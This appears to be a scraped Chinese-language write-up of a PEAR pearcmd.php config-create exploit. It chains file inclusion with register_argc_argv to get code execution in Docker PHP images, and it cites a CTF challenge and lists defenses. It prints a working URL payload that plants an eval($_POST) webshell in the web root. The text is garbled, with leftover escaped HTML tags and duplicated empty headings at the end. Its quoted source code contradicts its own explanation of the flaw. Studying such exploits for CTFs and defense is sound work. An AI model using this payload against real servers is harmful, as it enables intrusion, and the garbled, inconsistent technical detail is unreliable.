PEAR组件在Docker生态中的无文件RCE漏洞分析与利用<\/h1>

漏洞概述<\/h2>
PEAR（PHP Extension and Application Repository）是PHP官方维护的代码仓库系统，`pearcmd.php<\/code>是该生态的核心控制脚本。在特定条件下，攻击者可以利用PEAR组件的config-create<\/code>命令实现无文件RCE（远程代码执行）。<\/p>`

漏洞原理<\/h2>
核心机制<\/h3>

参数注入<\/strong>：当PHP配置register_argc_argv=On<\/code>时，URL中的+<\/code>符号会被解析为参数分隔符<\/li>
命令执行<\/strong>：通过文件包含漏洞包含pearcmd.php<\/code>，并注入config-create<\/code>命令参数<\/li>
文件写入<\/strong>：config-create<\/code>命令可将任意内容写入指定文件，包括PHP webshell<\/li>
<\/ol>
关键组件<\/h3>

\/usr\/local\/lib\/php\/pearcmd.php<\/code> - PEAR组件的默认安装路径（Docker环境强制存在）<\/li>
Console_Getopt::readPHPArgv()<\/code> - 参数解析方法，将URL参数转换为命令行参数<\/li>
<\/ul>
漏洞利用条件<\/h2>
必要条件<\/h3>

PHP版本 ≤ 7.4（Docker默认环境）<\/li>
register_argc_argv=On<\/code>（可通过phpinfo()<\/code>查看）<\/li>
PEAR组件已安装（路径\/usr\/local\/lib\/php\/pear<\/code>）<\/li>
存在文件包含漏洞（如include($_GET['file']);<\/code>）<\/li>
<\/ol>
非必要条件但常见于漏洞环境<\/h3>

容器化环境（Docker）<\/li>
文件后缀白名单限制仅允许包含.php<\/code>文件<\/li>
<\/ol>
漏洞利用详解<\/h2>
攻击流程<\/h3>

通过文件包含漏洞包含pearcmd.php<\/code><\/li>
注入config-create<\/code>命令参数<\/li>
将PHP webshell写入web可访问目录<\/li>
访问写入的webshell执行任意命令<\/li>
<\/ol>
典型Payload<\/h3>
http:\/\/target\/?file=\/usr\/local\/lib\/php\/pearcmd.php&+config-create+\/<?=eval($_POST[2]);>+\/var\/www\/html\/a.php
<\/code><\/pre>
参数解析<\/h3>

&<\/code>：URL参数分隔符<\/li>
+<\/code>：空格替代符（URL编码为%2b）<\/li>
\/<\/code>：伪造绝对路径起始符<\/li>
<\/ul>
技术细节<\/h2>
config-create命令实现<\/h3>
function<\/span> doConfigCreate<\/span>($command, $options, $params) {
<\/span><\/span>    if<\/span> (count<\/span>($params) <<\/span> 2<\/span>) {
<\/span><\/span>        return<\/span> PEAR<\/span>::<\/span>raiseError<\/span>("config-create: expecting 2 parameters"<\/span>);
<\/span><\/span>    }
<\/span><\/span>    if<\/span> (!<\/span>file_exists<\/span>($params[0<\/span>])) {
<\/span><\/span>        return<\/span> PEAR<\/span>::<\/span>raiseError<\/span>("config-create: source file does not exist"<\/span>);
<\/span><\/span>    }
<\/span><\/span>    if<\/span> (!@<\/span>is_writable<\/span>(dirname<\/span>($params[1<\/span>]))) {
<\/span><\/span>        return<\/span> PEAR<\/span>::<\/span>raiseError<\/span>("config-create: cannot write to destination directory"<\/span>);
<\/span><\/span>    }
<\/span><\/span>    $content =<\/span> file_get_contents<\/span>($params[0<\/span>]);
<\/span><\/span>    file_put_contents<\/span>($params[1<\/span>], $content);
<\/span><\/span>    return<\/span> true<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞成因<\/h3>

直接写入用户输入的$content<\/code>未做PHP代码检测<\/li>
仅检查是否以\/<\/code>开头，未限制路径归属目录<\/li>
使用Web进程权限写入，未校验目标目录所有权<\/li>
<\/ol>
实际案例<\/h2>
[NSSRound#8 Basic]MyPage<\/h3>
题目存在文件包含漏洞，利用pearcmd获取shell：<\/p>
?file=\/usr\/local\/lib\/php\/pearcmd.php&+config-create+\/<?=eval($_POST[2]);>+\/var\/www\/html\/a.php
<\/code><\/pre>
元旦水友赛<\/h3>
利用pear工具的config-create<\/code>命令：<\/p>

第一个参数：被写入文件的内容（PHP代码）<\/li>
第二个参数：写入的文件路径<\/li>
<\/ul>
防御措施<\/h2>

禁用register_argc_argv<\/code>（设置为Off）<\/li>
删除或限制访问pearcmd.php<\/code><\/li>
严格过滤文件包含参数<\/li>
限制web目录的写入权限<\/li>
升级到最新PHP版本<\/li>
<\/ol>
总结<\/h2>
PEAR组件的无文件RCE漏洞展示了传统防御机制在特殊环境下的局限性。该漏洞利用PHP参数解析特性、PEAR组件功能以及Docker默认配置的组合，实现了无需文件上传的代码执行，是容器化环境中需要特别注意的安全风险。<\/p>

PEAR组件在Docker生态中的无文件RCE漏洞分析与利用<\/h1>

漏洞概述<\/h2> PEAR（PHP Extension and Application Repository）是PHP官方维护的代码仓库系统，pearcmd.php<\/code>是该生态的核心控制脚本。在特定条件下，攻击者可以利用PEAR组件的config-create<\/code>命令实现无文件RCE（远程代码执行）。<\/p>

漏洞利用条件<\/h2>

漏洞利用详解<\/h2>

技术细节<\/h2>

实际案例<\/h2>